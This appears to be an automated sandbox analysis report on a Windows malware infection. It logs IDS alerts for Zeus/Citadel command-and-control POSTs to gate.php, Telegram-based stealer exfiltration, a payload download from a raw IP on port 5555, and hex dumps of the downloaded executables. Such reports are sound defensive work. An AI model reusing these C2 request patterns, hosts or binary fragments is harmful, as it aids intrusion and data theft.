Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49741 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49743 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49743 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49742 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49742 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49742 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49886 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49898 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49898 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49898 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49873 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49873 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49873 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49905 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49905 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49905 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49905 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49881 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49881 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49881 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49886 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49886 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49890 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49890 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49890 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49881 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49946 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49886 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49946 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49946 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49958 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49958 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49958 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49958 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50010 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49987 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49997 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.4:50010 -> 149.154.167.220:443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Queries Google from non browser process on port 80

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe

HTTP traffic: GET /webhp HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.google.com Connection: Close Cache-Control: no-cache

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49952

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49896 -> 51.21.41.165:5555

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:21 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Sun, 29 Oct 2023 11:53:52 GMTETag: "2a800-608d993459400"Accept-Ranges: bytesContent-Length: 174080Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 67 ae bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 9e 02 00 00 08 00 00 00 00 00 00 4e bd 02 00 00 20 00 00 00 c0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc bc 02 00 4f 00 00 00 00 c0 02 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9d 02 00 00 20 00 00 00 9e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 96 05 00 00 00 c0 02 00 00 06 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 02 00 00 02 00 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bd 02 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 36 01 00 70 86 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1 14 9c 61 74 69 bc f2 bf 90 32 04 b0 67 29 e2 a3 91 b8 c6 25 93 c9 f6 0f 50 bc d9 e0 37 5e c3 3c 24 c3 96 22 db e1 15 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 a3 ca 50 75 1a 7c 8e 60 c8 96 58 a4 18 f4 97 45 c8 d6 02 67 df 31 f3 de 46 89 4f 55 d0 84 a0 b4 39 3d d7 5e 74 4c 83 c4 6c 87 55 9f db 25 7f 2f 5e 7d 98 a4 d7 e0 12 3c 20 62 93 a9 96 30 8d d3 c0 81 38 94 07 68 1f 90 7a f9 3b 19 47 a2 f1 45 62 54 f3 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:23 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Wed, 13 Dec 2023 16:20:48 GMTETag: "547e00-60c668cc23800"Accept-Ranges: bytesContent-Length: 5537280Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 d0 d9 79 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 68 01 00 00 12 53 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 55 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 d5 01 00 3c 00 00 00 00 10 55 00 50 03 00 00 00 e0 54 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 20 55 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 80 01 00 28 00 00 00 10 84 01 00 38 01 00 00 00 00 00 00 00 00 00 00 38 d7 01 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 66 01 00 00 10 00 00 00 68 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 5d 00 00 00 80 01 00 00 5e 00 00 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 52 00 00 e0 01 00 00 a8 52 00 00 ca 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 a4 01 00 00 00 e0 54 00 00 02 00 00 00 72 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 f0 54 00 00 02 00 00 00 74 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 55 00 00 02 00 00 00 76 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 03 00 00 00 10 55 00 00 04 00 00 00 78 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 20 55 00 00 02 00 00 00 7c 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:30 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Fri, 27 Dec 2024 18:27:01 GMTETag: "4479-62a449be39780"Accept-Ranges: bytesContent-Length: 17529Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 34 f9 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 30 00 00 00 20 00 00 00 90 00 00 80 ca 00 00 00 a0 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c e3 00 00 78 01 00 00 00 d0 00 00 1c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 90 00 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 00 00 00 a0 00 00 00 2c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 20 00 00 00 d0 00 00 00 16 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 31 2e 32 35 00 55 50 58 21 0c 09 02 0a 1c 91 4f 1d 95 4a d1 4f 1f a8 00 00 69 2a 00 00 00 76 00 00 26 01 00 49 fd 7f 7b e5 68 68 00 03 04 70 7d 40 00 e8 01 00 20 be 83 c4 0c ba 67 6e 8f 11 e8 af 52 16 a3 74 0e 04 10 bf c7 ce 77 18 9c 2f 24 50 00 34 49 27 fb db 6c 76 04 34 8e 28 a3 27 ec 48 ec 68 01 36 b9 fd 3d ec d0 40 8b 15 0a e8 89 8f 4c b8 00 f6 bd d9 9e 1e 0e 9a ff 35 a4 7f 24 01 4c 76 de 75 3f 23 cc 8d 0d a8 29 5a 0b 1f fc ff 35 1b b3 f7 cc 77 2a 77 b4 30 05 0b 6c c9 b2 7b 20 37 0d 26 a0 53 65 0f 7b 81 15 37 dc 51 53 95 4c 85 1c a4 8e b2 ec 42 32 9c 16 15 8b 98 b2 85 bd 57 0b ca 65 16 4a 64 43 92 ed d4 1c 94 2f 17 c3 5e ec 9d 1b ff 00 0f 4a 78 a3 7c 7b 05 dc ff 6d fe 0f ac a3 88 8b 1d 91 21 db 0f 84 79 06 00 0d c1 4e f6 ff 13 83 c3 fb 89 d8 99 52 50 2b 4b 3c ef d8 fb 06 c8 03 00 15 a1 0f 31 97 bd 80 0d 8c f5 20 a9 24 f7 ef ed ef 1c ff 05 15 ba 0c 70 04 59 89 0d 0b 03 0d 50 71 1c 45 7e 6f 6d 98 8e 27 88 ec 05 00 42 18 7f c8 f7 93 9d 09 b8 aa c1 f3 08 03 1d 0e 89 17 d8 c2 de a1 04 ab 8f 89 32 14 e6 fe c3 83 fb 03 0f 85 8b 5c 95 02 10 7b b2 37 4e 38 4e ec a3 8c 91 ed 9e b1 9d 2e f9 8b 90 db 80 bf 1d 08 ce ff b3 2f 97 77 ec 89 d7 a1 88 a4 83 04 24 f9 83 54 24 04 ed d3 ff ff ff 58 5a 39 d7 7c 0

Source: Joe Sandbox View	IP Address: 173.222.162.51 173.222.162.51
Source: Joe Sandbox View	IP Address: 173.222.162.32 173.222.162.32

Source: Joe Sandbox View

ASN Name: DE-FIRSTCOLOwwwfirst-colonetDE DE-FIRSTCOLOwwwfirst-colonetDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic	Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 51.21.41.165:5555 -> 192.168.2.4:49952
Source: Network traffic	Suricata IDS: 2016172 - Severity 2 - ET MALWARE Generic -POST To file.php w/Extended ASCII Characters : 192.168.2.4:49739 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016172 - Severity 2 - ET MALWARE Generic -POST To file.php w/Extended ASCII Characters : 192.168.2.4:49741 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2016173 - Severity 2 - ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49958 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2016173 - Severity 2 - ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49886 -> 212.224.93.93:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49987 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: POST /file.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 130Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /file.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 142Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /file.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /file.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /file.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 141Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 548Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /webhp?gws_rd=ssl HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Cache-Control: no-cacheHost: www.google.comConnection: CloseCookie: AEC=AVcja2fZ5WoToRr8N0EKwXEQHhpU0b7fMrW843GyTClJXu_gwVa_4Pyv2w; NID=521=ghRckTstDGUFWLLeGG59dPxXLE5arcREGZ79_4NQ9dnMJUjGl2efELGFvPE8r53aIGZ9-m7D1otiKeeMO4NAmx9vJv_XceVM4ed_sLcgqM8jkysPWnq03BiDjW41P4JdGFGTI8o9RNbzQtedai-JTyBLx9iGgp5FQKMaiLtWnKU_6QcwgAv-PutmFhhN7cDd4lW0TeQdfH1jJ2Y
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 1055Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 438Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 561Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 570Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /webhp HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UIServices.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
